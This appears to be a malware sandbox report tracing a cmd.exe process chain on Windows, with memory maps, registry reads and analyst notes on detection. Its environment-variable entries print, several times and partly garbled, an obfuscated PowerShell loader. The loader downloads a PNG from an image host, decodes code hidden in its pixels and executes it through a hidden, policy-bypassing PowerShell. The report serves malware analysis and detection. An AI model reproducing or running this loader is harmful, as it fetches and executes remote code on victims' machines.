Get Environment String name = +,\, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = ]#, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = _`@#, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = [_, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = $_'}, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = \[,#, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = ,`, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Process #8: cmd.exe
60 0
Information Value
ID #8
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ^ft^Y^p^e | ^f^iN^d^S^t^r ^c^m
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0xb24
Parent PID 0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B28
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00046fff Pagefile Backed Memory r True False False -
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory rw True False False -
pagefile_0x0000000000150000 0x00150000 0x00153fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
locale.nls 0x00170000 0x001d6fff Memory Mapped File r False False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x0000000000200000 0x00200000 0x002fffff Private Memory rw True False False -
private_0x0000000000300000 0x00300000 0x003fffff Private Memory rw True False False -
pagefile_0x0000000000400000 0x00400000 0x00587fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000590000 0x00590000 0x00710fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000720000 0x00720000 0x01b1ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001b20000 0x01b20000 0x01e62fff Pagefile Backed Memory r True False False -
private_0x0000000001e70000 0x01e70000 0x01e70fff Private Memory rw True False False -
private_0x0000000001e80000 0x01e80000 0x01f7ffff Private Memory rw True False False -
sortdefault.nls 0x01f80000 0x0224efff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (9)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 4
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xb2c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\system32\findstr.exe os_pid = 0xb34, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
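Operation Module Additional Information Success Count Logfile
[Analyst note: the four kernel32.dll lookups below (SetThreadUILanguage, CopyFileExW, IsDebuggerPresent, SetConsoleInputExeNameW) also appear, with the same addresses, in Process #9's Module table, and they are what cmd.exe itself resolves at start-up. The IsDebuggerPresent entry should not, on its own, be scored as anti-debugging by the sample.]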
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:15 (UTC) True 1
Fn
Get Time type = Ticks, time = 140603 True 1
Fn
Environment (19)
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Process #9: cmd.exe
300 0
Information Value
ID #9
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" ftYpe "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0xb2c
Parent PID 0xb24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B30
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x00000000001b0000 0x001b0000 0x002affff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory rw True False False -
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory rw True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
pagefile_0x0000000000620000 0x00620000 0x007a7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007b0000 0x007b0000 0x00930fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000940000 0x00940000 0x01d3ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001d40000 0x01d40000 0x02082fff Pagefile Backed Memory r True False False -
private_0x0000000002090000 0x02090000 0x0218ffff Private Memory rw True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdefff Private Memory rw True False False -
Host Behavior
File (7)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
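Registry (269)
[Analyst note: most of these 269 operations are the Enumerate Keys calls on HKEY_LOCAL_MACHINE\Software\Classes listed below. That pattern is consistent with the ftype built-in named in this process's command line walking the file-type associations, rather than with targeted registry reconnaissance. For detection, the more useful signal is a short-lived cmd.exe /c child running ftype, not the registry volume.]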
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
